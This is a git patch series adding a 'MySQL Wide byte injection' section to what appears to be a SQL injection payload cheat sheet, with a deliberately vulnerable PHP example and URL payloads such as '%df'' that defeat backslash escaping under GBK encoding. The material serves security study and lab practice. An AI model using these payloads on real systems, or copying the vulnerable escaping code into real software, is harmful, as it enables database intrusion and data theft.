From 9574af9dd1f69c920dab5849bf710f30566c4ce9 Mon Sep 17 00:00:00 2001
From: Mane <mane@manesec.com>
Date: Wed, 13 Sep 2023 08:13:36 -0700
Subject: [PATCH 1/2] Update MySQL Injection.md

Add MYSQL Wide byte injection, it can test in Sqli-labs Less-32
---
 SQL Injection/MySQL Injection.md | 33 ++++++++++++++++++++++++++++++++
 1 file changed, 33 insertions(+)

diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md
index 5d19b433..e8968416 100644
--- a/SQL Injection/MySQL Injection.md	
+++ b/SQL Injection/MySQL Injection.md	
@@ -22,6 +22,7 @@
     * [Using SLEEP in a subselect](#using-sleep-in-a-subselect)
     * [Using conditional statements](#using-conditional-statements)
 * [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)
+* [MYSQL Wide byte injection](#mysql-wide-byte-injection)
 * [MYSQL Current queries](#mysql-current-queries)
 * [MYSQL Read content of a file](#mysql-read-content-of-a-file)
 * [MYSQL Write a shell](#mysql-write-a-shell)
@@ -438,6 +439,38 @@ make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(51
 (select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=concat(@a,table_name,0x203a3a20,column_name,0x3c62723e))))a)
 ```
 
+
+## MYSQL Wide byte injection
+
+Wide byte injection works only when mysql's encoding is set to gbk, a small php example: 
+
+```php
+function check_addslashes($string)
+{
+    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash
+    $string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash
+    $string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash
+      
+    return $string;
+}
+
+$id=check_addslashes($_GET['id']);
+mysql_query("SET NAMES gbk");
+$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
+print_r(mysql_error());
+```
+
+PHP will check quote and add backslash, like translates `'` into `\'`.
+
+when input: `?id=1'` --> `SELECT * FROM users WHERE id='1\'' LIMIT 0,1`, not working.
+
+But if add `%df` like `?id=1%df'` -->  `SELECT * FROM users WHERE id='1運\' LIMIT 0,1`, it will work
+
+Because that way can one escape `'`, 
+
+So, it can be: `?id=1%df' and 1=1 --+`  -->  `SELECT * FROM users WHERE id='1運\' and 1=1 --+ LIMIT 0,1`, it can be inject.
+
+
 ## MYSQL Current queries
 
 This table can list all operations that DB is performing at the moment.

From 811d71026fa18c98a374c17a4d3586c762a06a6b Mon Sep 17 00:00:00 2001
From: Mane <mane@manesec.com>
Date: Wed, 13 Sep 2023 08:33:03 -0700
Subject: [PATCH 2/2] Update MySQL Injection.md

fix typo
---
 SQL Injection/MySQL Injection.md | 10 ++++------
 1 file changed, 4 insertions(+), 6 deletions(-)

diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md
index e8968416..54a352e4 100644
--- a/SQL Injection/MySQL Injection.md	
+++ b/SQL Injection/MySQL Injection.md	
@@ -442,7 +442,7 @@ make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(51
 
 ## MYSQL Wide byte injection
 
-Wide byte injection works only when mysql's encoding is set to gbk, a small php example: 
+Wide byte injection works only when mysql encoding is set to gbk, a small php example: 
 
 ```php
 function check_addslashes($string)
@@ -462,13 +462,11 @@ print_r(mysql_error());
 
 PHP will check quote and add backslash, like translates `'` into `\'`.
 
-when input: `?id=1'` --> `SELECT * FROM users WHERE id='1\'' LIMIT 0,1`, not working.
+When input: `?id=1'` --> PHP add backslash --> `SELECT * FROM users WHERE id='1\'' LIMIT 0,1` --> not working.
 
-But if add `%df` like `?id=1%df'` -->  `SELECT * FROM users WHERE id='1運\' LIMIT 0,1`, it will work
+But if add `%df`: `?id=1%df'` --> PHP add backslash --> `SELECT * FROM users WHERE id='1%df\'' LIMIT 0,1` --> ( `\` : `%5c`, `%df%5c` : `連` ) --> `SELECT * FROM users WHERE id='1連'' LIMIT 0,1` --> can escape `'`.
 
-Because that way can one escape `'`, 
-
-So, it can be: `?id=1%df' and 1=1 --+`  -->  `SELECT * FROM users WHERE id='1運\' and 1=1 --+ LIMIT 0,1`, it can be inject.
+So, it can be: `?id=1%df' and 1=1 --+` --> PHP add backslash-->  `SELECT * FROM users WHERE id='1連' and 1=1 --+' LIMIT 0,1`, it can be inject.
 
 
 ## MYSQL Current queries